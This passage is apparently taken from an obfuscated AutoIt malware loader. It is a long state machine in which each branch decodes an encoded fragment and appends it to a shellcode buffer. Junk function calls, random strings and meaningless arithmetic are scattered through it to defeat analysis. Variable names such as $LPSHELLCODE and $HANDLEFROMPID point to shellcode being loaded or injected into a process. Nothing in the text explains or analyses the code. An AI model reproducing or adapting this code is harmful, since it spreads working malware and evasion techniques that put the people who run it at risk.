605510513 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,5..4..,61,6..2..,..57,4..,6..,..53..,5..6,2,..3..,..61,6..0..,3..,4..,3..,6..1..,..2..,6..0,2..,56,..3,61..,2,..57.." , ".." ) ) ISBINARY (1090447 + 2514972 + 4293342371 ) $656182541 = 1368549586 DIM $HT5JQAC3UG1HEWGGIC5M = "TCQoweL2f2VkwKsCFMsyFzjVHWTSfn6UdAYppu46AboNf7ilneL0LXftt4QKv3W26bg6XcmlSw" DIM $OKNGEBKFHQUD5UOTJGOW = 2833401 + 3416383 + 1558029 + 3447519 + 4294464966 ENDIF IF $656182541 = 621304772 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,..1..,5..3,..53,5..3..,..5..3,..5..3..,53,6..1..,..5..6..,..6..0,..4,..6..,57..,..53,..53,53,..6..,6..1..,..57,..61,53,..53,53,..5..3.." , ".." ) ) $656182541 = 696042996 PTR ("6YyVq040Ksg" ) STRING (1720008 * 3171788 ) ENDIF IF $656182541 = 696042996 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..53,5..3,..6..1,2,..62,..60..,..1,53,53..,5..3,5..3,5..3..,53,5..3,61..,56..,5..9,58,..6,..5..7..,..5..3..,53..,5..3..,..5..6.." , ".." ) ) CHR (600320 ) $656182541 = 543265363 ENDIF IF $656182541 = 706340665 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,6..,..6,6..0,..5..8,5..3,..3,6..,6,..60..,..58,..5..3,..6..1..,6,..6..,5..8..,58,1..,57,61..,5..8,3,5..3,5..3..,6" , ".." ) ) ISPTR ("fIwWiCf1jaKf" ) $656182541 = 1832168266 ISSTRING ("vcNvEOfKh1dz17aW7b9rXS5BT0dokooxbz9eBm1" ) ENDIF IF $656182541 = 730792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50..,5..7..,..57,..5..9,3..,59,3,57,..5..6..,..59,..54,59,..3,5..9,3..,..5..5..,..61,..5..5,..55..,59,2,..59,..58,..6..0,5..5,5..9,5..,..5..9..,5..8,5..9..,3..,5..6,..56,5..6..,55..,..5..5,5..5,..5..5,3..,5..5,5..3,..5..5,..5..5..,60..,5..3,60..,5..7,60,55..,55,..5..5..,55..,3,5..5,53..,..5..5,..55,5..8..,..59..,5..9..,62..,60,..55,60..,5..7..,..6..0..,..5..8,59..,..5..4..,..5..9,..3..,..57..,..5..4..,..5..9.." , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..59,3..,5..9,6,59,..56..,55,..5..5..,..5..5..,3,55..,..53..,..55..,..5..5..,..5..9..,..57..,60..,6..0,5..9,6..,6..0,..55..,..59,57,..5..5,..5..5..,..55,3..,5..5,53..,5..5..,5..5,56,..53,55..,..55..,55..,3,5..5..,53,..55,..55..,..5..9..,..5..7,..60,..6..0..,59..,6,..6..0,55,..59,..57..,..5..5..,5..5,55,3..,55" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..5,57..,5..9,5..5,5..9,..62..,..59,5..,57..,..3..,55..,3,55..,..5..3..,5..5,5..5,5..9,..5..7..,..6..0..,..60..,..5..9,6..,6..0..,55,..5..9..,..5..7..,55,..5..5..,..55,3,..5..5..,..5..3..,..55,..5..5,..5..6..,53..,..6..0..,6..1..,..5..6,5..6..,56,5..3,..5..6..,..53,56..,53,..5..5..,..55..,..5..5..,..3..,..55..,..53..,..5..5,..55..,5..9,5..7..,60..,..6..0,59..,6..,..6..0,..5..5,..59..,57..,55,55..,5..5..,..3..,..5..5..,5..3,..5..5..,..55..,..56..,..53..,..60..,..6..1..,56,..5..7..,..56,53,..5..5,55..,5..5..,62,..5..8,..2,5..5,..55,5..6..,..5..3..,..5..5..,..55..,58,4.." , ".." ) ) ) ) $656182541 = 467902548 RANDOM (400706 ) DIM $DM7RDGGMGLMOK0Z2LQXB = 3867971 ENDIF IF $656182541 = 737653776 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..6..1..,53..,..5..3..,61..,..2..,..57..,58,6..,..6..1,..53,6,..2..,60..,..53,..5..7,..6..0,53,..6..1,2,53,5..7,..61..,56..,53.." , ".." ) ) ISPTR ("o4U5vhh6l7rH342w7pJmGnBfwAmqji2mGL2L3l0EHOOBKeWCJK7ej8ubCNH540WcfebqcqCWzfO2H9EsNTRHkXdIq0jpM4JR2LwGdEAt" ) $656182541 = 38669117 INT (1865668 ) ENDIF IF $656182541 = 762027222 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,..62..,..5..7,58,..6..,61,..61,..5..8..,..3..,5..3,6..0..,..58,..56,2,6..1,5..8,..6..,6..,..53..,..6,61..,..57,..55,56..,53" , ".." ) ) $656182541 = 1479637702 ENDIF IF $656182541 = 762656979 THEN LOCAL $BINL = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0,5..7..,..55,59..,..62,5..9..,..5..,59,54..,..6..0,55..,..6..0,6..2..,5..7,..3..,..5..9..,58..,59,5,..55,..61,5..5..,5..7..,57..,..5..5..,5..9..,..6..2,5..9..,..5,..58..,..6,..5..8,..5..6,59..,6..1,5..9,..58..,5..9,..3..,..5..9..,3..,59,56..,..5..9..,..6,59..,57..,5..9,5..8,..5..5..,..62" , ".." ) ) ) ) $656182541 = 730792303 DIM $CAMGNJEF896M8PJSWZ9I = "pYwRgxNyGNTeEJEnm5bjHuCGZk9h2XY3jcnlZzgV1gBvnICONekD79z4u016xFFU0Z5CwsyWZqrB3hspRuCXLt6jLs19IkwvKRFxNarvQyOQS8anHLodc" ISSTRING (3085209 + 1784653 + 4294103362 + 4291384977 ) ENDIF IF $656182541 = 781366022 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..5..9,6..1,2..,57..,6..0,5..6,..3..,61,2..,57..,5..7..,5..6..,..61,..60,..61,..53,..5..6,..3,..60,..6..1,2..,5..8..,..5..3..,5..5" , ".." ) ) DIM $4LRCHHNOPAMSNB75SS1J = 3948 + 4291464061 + 935259 * 1062352 + 62929 * 3135618 $656182541 = 864731176 RANDOM (2145152 ) ENDIF IF $656182541 = 784317271 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,5,..5..7..,..3..,6..0,..2..,..6..2,..53..,..5..7,3..,6..0,6..1,58..,6..0..,3..,6,6..,..6,6,..6..,6,5..,57..,61..,60" , ".." ) ) $656182541 = 158308218 PTR (1349936 * 3223997 ) ISFLOAT (2509884 + 4292517608 + 4292032918 + 4291755693 ) ENDIF IF $656182541 = 798922638 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..2,5..3,60,..5..3..,56,5..7,5..8,..54..,5..3,5..8..,5..3,61,..2,..57..,6..0..,..6,..6..1,5..3,..5..6,..3,..56..,58,..53,..6" , ".." ) ) $656182541 = 143550684 ENDIF IF $656182541 = 800246788 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..6,5..5..,3..,61..,2,..60,4,4,5..3,..61..,56..,..3..,60..,..5..5..,..3..,53,..5..6,6,5..,6,6,6..0,6..0,..6..,3.." , ".." ) ) $656182541 = 798922638 INT (1515389 ) ENDIF IF $656182541 = 823793270 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..59,..57,54..,6..1..,62,..5..7,4,..6..,..5..7..,..5..6..,2..,3..,..6..1,..60..,..55,..6..2,5..,56,..5..6,..6..,6,..59,..61,..53" , ".." ) ) $656182541 = 1508795126 ISSTRING ("5smjjm9nq8nSU2mjQTqVjttspT6CGlNugHg" ) ENDIF IF $656182541 = 836440117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,53..,..5..4..,5..3..,..5..3..,53..,..5..3..,5..6,5..6..,6,..6,6..,..6,..60,..5..9,58,57..,6..,6..,..60,..5..8,5..4,..5..3..,58..,5..6.." , ".." ) ) $656182541 = 269998012 ENDIF IF $656182541 = 848901156 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,..3..,53,6..0..,57..,5..4..,..6..2,6..1..,2..,53..,..5..7..,2..,..55..,5..3,56,..3..,..60..,58..,..53..,5..,..6..1,61,5..5,6,6" , ".." ) ) CHR (257452 ) $656182541 = 1718368979 ISPTR (2860008 + 789318 + 573977 + 4291086776 ) CHR (1034243 ) ENDIF IF $656182541 = 856025391 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..53,..5..3,..5..3..,5..3,53,..5..8,..6..0..,..5..8..,..5..6,..6,..6,58,..58,..3,5..7,..61,..2,..5..8..,4..,..6..,..3..,..5,..62,6" , ".." ) ) DIM $U3KLV13LX9SHM4OJNJFY = 1378063 $656182541 = 836440117 ISSTRING ("J5bF4LeketafYOXmLJ8dOtmga1T2VYWqDHLC8mNaZd" ) ENDIF IF $656182541 = 860380632 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,35..,4..0..,27,44..,..51,..2..0,41..,19..,4..6,..4..4,..35..,4..0,..33" , ".." ) ) ) DIM $AQO5KZFTQPS5EC3MZPGU = 2453505 + 192974 + 4294077630 + 4291182303 $656182541 = 762656979 ISBINARY (1251333 + 4291503526 + 863704 * 2574263 ) DIM $VUDRKHMNPWYYTNTSV2HF = 296936 + 4293382210 * 3643448 + 3415560 * 2324144 + 4292672430 + 1814128 + 4292169687 ENDIF IF $656182541 = 864731176 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,6..1,..2,58..,6..1,5..4,3..,53..,..56,4..,..60..,..6..1..,2..,57,..61,..5..5,..5..7..,..5..3,56..,..4..,6,61..,2..,..57..,53" , ".." ) ) ISFLOAT ("L7H6IWiy3h2eleW4vfWzqMeNXxvt6THcGRDh3ByhcBfCTEYxMXoe55K824jkAYBjJ0HEKOa4QOwYHL5sI8RiECgKgEo8soRn96236t" ) $656182541 = 1808850186 ISPTR ("qHWAq90KBhtNgT6yfAcKB7jYLTbvplUwke0dte79BMpgQrW" ) ENDIF IF $656182541 = 868457996 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..3,5..9..,..1,5..3,..53..,59,1..,..5..3,5..7..,..61..,..4..,5..7,58,..2..,3..,..58,..5..3,6..1..,2,61,5..8,2,57..,..6.." , ".." ) ) ISSTRING (2912355 + 1611821 * 3286816 + 4291133380 ) $656182541 = 2057237529 ENDIF IF $656182541 = 871530397 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,53..,5..3..,..6..1,4,61,..5..8..,..5..4,53,..6..,3,..6,6,..6..,..6,58..,..53,..6..,6..,58..,..58,..5..,6..1..,6..1..,..2.." , ".." ) ) DIM $23EADCIYSCHT72VTENLB = "GNupzb7q9UTXTq" $656182541 = 983205074 ISFLOAT (524470 + 4291556725 + 4292596246 ) ENDIF IF $656182541 = 896046375 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,59..,60..,5..6..,59,3,..6..1..,..2,..6..0,..4..,..4,..5..3,6..1..,..5..6,3..,..6..0,56,..3..,..53..,..5..6,6..,..5,..61,..2,53" , ".." ) ) $656182541 = 1428652054 ENDIF IF $656182541 = 937837217 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,6..,..6..1..,..57..,..57..,58,5..3..,5..5,5..3,..5..3..,53,..5..3,5..9,1..,5..7,5..3..,..59,61,53..,..53,56,..5..3,5..3..,..53,5..3.." , ".." ) ) $656182541 = 2069227035 DIM $BLHSRYGOKOCZL4195RDV = 3271304 ENDIF IF $656182541 = 954977294 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58..,..5..7,5..7..,6..,6..,6,..6,6,6,6..1..,4..,..5..7,..5..8..,62..,..57,..6..1..,6..2,61..,58,..57,6..1,6,..6,6,6" , ".." ) ) MOD (939398 , 2378577 ) $656182541 = 61093985 PTR ("8QyJ2eB8wD3I67Ak6z7p9pewtDRaUAQww3mnCycmbXBB5OsM7L0E405TLcqyxBn5YFlcUmRHxVomXLANldciJkCF8DLziNZIJGMyCq2V4shiLT" ) ENDIF IF $656182541 = 983205074 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..4,5..4,5..3,3,6..0,6..1..,5..8,54..,..53..,..6..,..3,6,..6..,6..,6,53..,..60..,53..,..5..3..,..53..,..5..4..,5..3,..5..3..,..6..1.." , ".." ) ) ISBINARY (853234 + 4294669970 ) $656182541 = 1364348677 ENDIF IF $656182541 = 1014469933 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..2,..5..7,..5..9,..5..6..,..57,..55,6..2,5..3,..57,..54..,..6..2..,6..1,..2..,..57..,..4,6,5..3..,..61,2,5..7,60,..5..6..,..57..,..53" , ".." ) ) $656182541 = 469934669 CHR (2930591 ) ISBINARY ("ck5lqoqdt4pHMYFAFjEl9vXlLkL4xn6fOaIArhi0dJTVZS7C2szFhe9RxTIfLwOg7j2LpfixaOhyMcw3nibfXA8Kb2dIHcnQ4LXOZunXjbEC6JeuvQ2DvJ" ) ENDIF IF $656182541 = 1027989821 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..60..,..3,5..4..,5,..59..,..5..3,..57,53..,..5..6,6,..5..3..,..6..1..,..2..,..3,..59..,..5..5,58..,..53..,53..,..5..3..,5..3..,..53..,..5..3..,..6" , ".." ) ) $656182541 = 1138660241 DIM $JZ7BBEAOSE34N5V5FNAY = "n2kTuusqEHT0WJmHaEfdgNL9IhNHKOMkIsw6WSgjR7mFjeBvIxEjuULIqlkmQVQZ4IqCnpVrx5vjAfZEQs8mkC" ENDIF IF $656182541 = 1032281943 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..6..1..,..6..2..,..5..7..,..4..,6..,..5..3,4,..5..4,..5..,..6..1,..5..6,2..,3,61,..6..0..,..5..5,..2..,..2..,..6..1..,2..,57,4..,..6..,..57" , ".." ) ) ISFLOAT (2686755 + 4291363587 + 4291191705 ) $656182541 = 1469834065 ISPTR (543575 + 4294142473 ) ENDIF IF $656182541 = 1038131997 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..6,..56..,..6,6..,..3,60,57..,..58..,..5..,3,5..3..,..54,53,53,5..3,..5..3..,53,53,..5..8,..6..0..,6..,..6..,6..0..,..5..8,4" , ".." ) ) STRING ("lwQGxWDOBTBVzJkU" ) $656182541 = 1295546840 ENDIF IF $656182541 = 1048715572 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,3..,6..1,..6..1..,..5..6,..6,..5,53..,5..5,6,6..,..2,..57..,..2,5..8,..5..8..,61,..6..,..6,..6,..6..,..6..,..6..,..53,..6.." , ".." ) ) $656182541 = 1700940958 ISFLOAT (3843284 + 4293224952 + 2601517 + 4294039111 ) ENDIF IF $656182541 = 1051260188 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,..5..3,6..1,60..,..55,..5..,..60..,56,..5..6,..3..,53..,58,6..,58,..5,5..8..,..2..,..6..1,2,5..,5..8,5..8..,4,3..,55.." , ".." ) ) DIM $JXTJ1UNSTCBQ78JFRH80 = 853762 $656182541 = 737653776 INT (57263 ) ENDIF IF $656182541 = 1053930317 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..6..1..,..6..2,..61..,..5..8..,58,5..3..,..6..,..6,6..,6,6..,6..,..6..1..,4,5..7..,5..8,3..,3,..3..,..60..,..6..1..,5..8..,59,..5..3.." , ".." ) ) DIM $52HVPETTXWBB6HEABBNH = 3122445 $656182541 = 586524435 DIM $3BZGTR5MGIJLTEWWULXV = "Wls2I2ntZ9KBmkr40cVFs" ENDIF IF $656182541 = 1061461686 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..62..,5..8..,..3,5..3..,57,53,61,..4..,..5..7,..4,62..,3..,..5..8..,..54..,5..8,..5..3..,6..,6..,..6..0..,60..,5,57..,61,2" , ".." ) ) INT (3321565 ) $656182541 = 602321455 ISPTR ("rhi2h0gOVZStRJHjGuEC4JMo1lpccZTB4CSDttdBXl" ) ENDIF IF $656182541 = 1070530058 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..3..,..53,..5..3..,5..3..,..53..,..53..,..61..,..2..,60,5..9..,..53..,..3,..61,2,60..,..59,..53,3,6..1,..2,5..6..,..5..9..,..61,2" , ".." ) ) WINEXISTS ("SOlYr6BRD3a5JeL6gqyo2e0nqdOTtSA1t4twN4k8ba" ) $656182541 = 39019882 INT (545323 ) ISBOOL ("HKNCNZ8HnqTxWCiLOVormgzm2fy4il6j933qOBOHOv6SsLn7jGm7tcLAkBKIzezctIy2J26nfRM0jS3p1BUK89Z7rBfn0ghK6" ) ENDIF IF $656182541 = 1079557876 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..6..0..,..5..,..6..1..,53..,56,57..,..58,..6,61..,..5..8..,5..3..,..6..,..6,60..,5..8,4..,6..1,..6..,6..,5..8..,5..8..,..3..,3..,..6..1" , ".." ) ) ISPTR ("xrJ91MyWrCHvR8tYetTAJiWTx9Ic3qtkbFdCb9hmH" ) $656182541 = 1396856746 ISBINARY (1977577 + 1084610 + 3281510 ) ENDIF IF $656182541 = 1082073854 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,6,60..,59,57,..5..8..,5..3..,..6..,2,..6..0..,..57,..57,..57,..1..,53,..6..1,59,59,..61,..58..,..3,53,..6..0..,..57..,5..5" , ".." ) ) MOD (2012800 , 3375319 ) $656182541 = 369187565 DIM $W2AIXTK51WEMG3E8IE2J = 1651781 CHR (1030540 ) ENDIF IF $656182541 = 1131844544 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,6..,61..,..5..8..,5..9,..54,..53..,..55..,5..3,5..3..,5..3,5..3..,..59,1,..5..7..,..53,..5..9..,6..1..,5..3,..5..3..,..56,5..3,..5..3,..53..,5..3" , ".." ) ) $656182541 = 1745262236 RANDOM (734950 ) ENDIF IF $656182541 = 1138660241 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,6..0,5..7,..53,2,3,..54,..5..,6..1..,..5..4,61,..56..,56,6..,53..,..6..1,..5..4,..5,..59,6,..6,6..,..6..,6,..6.." , ".." ) ) $656182541 = 1924764602 ISSTRING ("ooyvU1D3QrvWTsNLhI2n" ) ENDIF IF $656182541 = 1196440215 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,2..,6..0..,5..9,..5..4,..6..1..,..61..,6..2..,60,..5..8,2,..61..,..61,6..2,60..,..4,..3,..61,5..9,..57,6..1..,2..,5..6,..58,..56" , ".." ) ) $656182541 = 1070530058 RANDOM (1581921 ) PTR (3137932 + 4294245099 + 4293345740 * 1588072 ) ENDIF IF $656182541 = 1203322726 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..3..,58,..58..,61,2..,..5..,3,58,5..9,..58..,..6..0..,6..1..,2,..60,4..,..5..3,6..1,56..,5..6,..6..,..59..,5..8..,60,5.." , ".." ) ) DIM $FKYO6DIFJLDGZGEVC3EL = 967967 $656182541 = 113519199 RANDOM (1893247 ) ENDIF IF $656182541 = 1205248241 THEN LOCAL $HANDLEFROMPID = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,5..7..,5..9..,..3..,..5..9..,..3,57..,..56..,5..9,..5..4,5..9,..3..,5..9..,..3,5..5..,..6..1..,..5..5..,..5..5..,..5..9..,..2,..59,58..,..6..0,55..,5..9,..5..,..5..9,..5..8..,5..9..,..3..,5..6..,..5..6..,56,..55..,..5..5,5,59,..57..,5..9..,..3..,59..,3..,55,..5..5..,..55..,3..,..55,..5..3..,55..,..5..5..,..59,..61..,..59..,..5..4,59..,..5,..59,..5..7,..5..9,..3,..59..,5..8,55..,..5..5..,..5..5,3..,..5..5,..5..3,55,55,..5..7..,..6,60..,5..3,5..9..,..58..,..5..9,5..,58..,5..3,..60..,5..5..,5..9,6,5..9,56..,5..9,5..8..,60,56,6..0,..5..6..,55,55,..55,3,5..5..,5..3..,5..5,55..,59,57..,60..,6..0,..59..,..6,..60,55,59..,..57..,..55..,5..5,55,3..,..5..5,53,5..5,5..5,56,..5..3..,6..0..,..61..,5..6,5..3..,..56..,..5..3..,5..6,..54..,5..7,59..,..56,..53..,5..7..,5..9,..57..,5..9..,5..7..,..5..9,..5..5,..55,55..,3,5..5..,53,55,5..5,..5..9,5..5..,..5..9..,6,5..9..,..6..,5..9..,..3,55,5..5..,55..,3..,..5..5..,..5..3,55,55,56,53..,..55..,..5..5,55..,..3..,5..5..,..53,..55,..55,5..9..,..57..,6..0,..6..0,..5..9..,..6..,6..0,5..5..,..59,..5..7,..5..5..,5..5,..55,..3,55,..5..3,5..5,5..7..,..58,5..5,59,58,..60..,57..,5..8,2,55..,55,56..,..5..3,5..5,55,..5..8,..4..,..55..,..6..2,5..8,2,..55,..5..5..,..56,5..3..,..55..,5..5..,5..8,..4" , ".." ) ) ) ) $656182541 = 1723957288 ISBOOL (1357373 + 756108 + 90066 ) WINEXISTS ("bTKFe1NOEKkZc3zN8atXTiFyDFlI" ) ENDIF IF $656182541 = 1207367525 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,..2..,..5..7,6,..3..,6..,..6,..6..,6,61..,..56,3..,..53,..5..3,61,..58,5..3..,..6..,6..,6..0,..5..8,..4..,..61..,..6..,6" , ".." ) ) $656182541 = 1253993868 ENDIF IF $656182541 = 1223622893 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..53..,..57,..5..9..,..61..,..56..,6,5,..53,5,60..,..3,4..,55,61,2..,..4,..6,59..,1..,54..,..53..,6..1,..4,..57.." , ".." ) ) CHR (1807614 ) $656182541 = 1569955931 ENDIF IF $656182541 = 1253993868 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,58,..4,..5..7..,6..1,5..8,..3..,..53..,53..,6..,..6..1..,..5..7,5..6,3..,..6,..5,..6,6,6..,..6..,..61,2..,57..,59,5..5" , ".." ) ) ISSTRING (2236803 * 1552509 + 3628622 ) $656182541 = 1587018324 ISSTRING (828572 + 2230834 ) ISBINARY (1748020 + 4291756790 ) ENDIF IF $656182541 = 1270739258 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6..,6,..6,6..,..6,..62,..56..,2,1..,6..2,57,53..,..5..6..,3..,60..,..6..1..,..58..,60..,..6..1,..6,6,6..,6..,..6.." , ".." ) ) $656182541 = 784317271 ISPTR (600974 * 3910146 * 3137530 ) ENDIF IF $656182541 = 1279551750 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5,6..,5,..6,6..,..6,6,61,4,..57..,58..,62..,3..,5..8..,53..,5..9..,1,..53,5..5,..6..,6..,60..,5..9..,..5..8,5..7" , ".." ) ) PTR ("lUWdmz0U9HwEy9VlLjGs3x7UMv" ) $656182541 = 180257576 DIM $XK4UDAFBGUKU9WEC9LKK = "s7tXXbA1wo1RGItDNRUGhAHTN77H2dzrgHEnJHpzOkTFtcBnU8uD0Nu1y" ENDIF IF $656182541 = 1295546840 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..6,6..,..58..,..5..8,..3..,5..3..,..6..1,..62,57..,..5..8,6,61..,61,..5..8,..3,..5..3..,..60,58..,..5..4..,5..7,..59..,61,5..3,..53" , ".." ) ) PTR ("8sZJK9ef3gBu17RcyKFUX4S5ABmMZ9yzuWmzQTBBiNfocFWxkvlHtteeJ3jiXAq4Sb9fUqvQieKiYD35QYCCX0gaRi0WJsNRxkGaFRM39" ) $656182541 = 856025391 MOD (2907010 , 3741157 ) ENDIF IF $656182541 = 1296565717 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..,..5..3..,2,6..1..,62..,..61..,..5..8..,55,..57,..6,..6..,6..,..6,..6,6..,6..1..,4..,57..,58,2,..5..3,6..1..,62..,..6..1,58" , ".." ) ) $656182541 = 2022545531 DIM $158XLAJGZZ3VN72Z8KJC = 1150284 ENDIF IF $656182541 = 1300820860 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57,..5..3,..59,..57..,..5..3..,..6..1..,..53,..56,6..1..,53,..5..3,..6..0,5..8,6..,..1,..55..,2..,3..,5..4,58,..4..,..3..,..5..5..,..53..,..5..7.." , ".." ) ) $656182541 = 1203322726 ISPTR ("OTJeOeGtbBzyIZZkKjhYDYyuZzdRLTSYU9UkkJrX2Njhc22bBKrJMGw1tpopbZSrULOJfNab1u6ZNqr6HboaBhkmM214ubWc62xzn" ) ENDIF IF $656182541 = 1318416169 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,3..,6,6..,6,..6..,..58..,5..3..,..6..,..6,..60,58,..4..,3..,..6..,..6,5..8,..58,..62..,..53,61..,5..8,..3,53,..53.." , ".." ) ) $656182541 = 100830152 MOD (2861522 , 1236259 ) MOD (189487 , 3886347 ) ENDIF IF $656182541 = 1330478138 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..3,5..,6..1,5..9..,6,..54,..61..,5..3,..4,..6..1..,..6..2..,61..,..5..8..,5..8,5..7,6..,..6..,..6,..6,6,..6..,..61,..2,5..7" , ".." ) ) $656182541 = 1048715572 ISFLOAT (2452762 + 4291149395 + 3191120 ) ENDIF IF $656182541 = 1364348677 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..60,54,5..6,..3,..5..3,56,..6,..5..4..,53..,6..,..2,..6..0..,57,..5..9,..54..,57,6..1,6..2,..6..0,4,..6..,61,61,62" , ".." ) ) WINEXISTS ("V21SpfAAmz1LfOY6btXBocW7WuUaEH2VSMBjgJB4kqMmKZ1H9jOFVBNTg364uz5NGf3CmNZB22r8yIw6Dlbv2w9q8SdmNGIUu8OE6xuvtnN" ) $656182541 = 411711931 ISFLOAT ("G9AjyJWjgMDDKMXutGMA41af1OcNThgsyFOOgzuUmFyt40VQAsIMd3MQ8vrTHhA8" ) DIM $E7HO3L2NXBRKA4VNZHDO = 2037021 ENDIF IF $656182541 = 1368549586 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,6,..61,53..,56,..6,2,61,..5..6,60,..4,5..,..3..,..53,..5..3..,6..1,..62..,5..7..,..6..0,5..6..,..57,..5..3,6..,6..1..,5..7" , ".." ) ) ISFLOAT (511549 + 320807 + 1705817 ) $656182541 = 621304772 ISPTR (2910683 + 2685881 ) ENDIF IF $656182541 = 1396856746 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58..,3..,..53,6..0,..5..7,54,..55..,6..1..,..2..,5..7..,..4,6,..5..7,..61..,5..6..,..3..,..6..0,55..,6..1..,..5..3,6..,..2..,6..0..,5..7..,..59.." , ".." ) ) MOD (1152203 , 663470 ) $656182541 = 823793270 ENDIF IF $656182541 = 1428652054 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,..1,6..2..,5..3..,..53,..5..3..,5..3..,..5..3,5..3,..55..,..53,60,5..7,..5..4,62..,6..1..,5..8..,3,53,..6..0..,..6..2,5..3,..57,5..9..,1" , ".." ) ) $656182541 = 438111387 RANDOM (1807612 ) ENDIF IF $656182541 = 1453481599 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..5..8..,..6..0..,59..,5..7..,5,5..4,..5..3,5..4,3..,..6..0,..6..1,58,..59,..6..1..,..6..,..6,6..,..6..,..6..,..6..,54..,..61,..5..,..57" , ".." ) ) $656182541 = 1947300206 DIM $B3BPOL4V2CE0NUXK0XAK = 255458 * 3018391 * 725577 + 4291946556 WINEXISTS ("DF5nxSbJJaOH91THnd25XQ8pbiQeT1dU8lKtTGa2YmzkyBV4B7GXS9dYHOlob71S64JXqzZRd9gJpY0JxVMWuqc9iWVduV11vSnE17" ) ENDIF IF $656182541 = 1461966853 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC 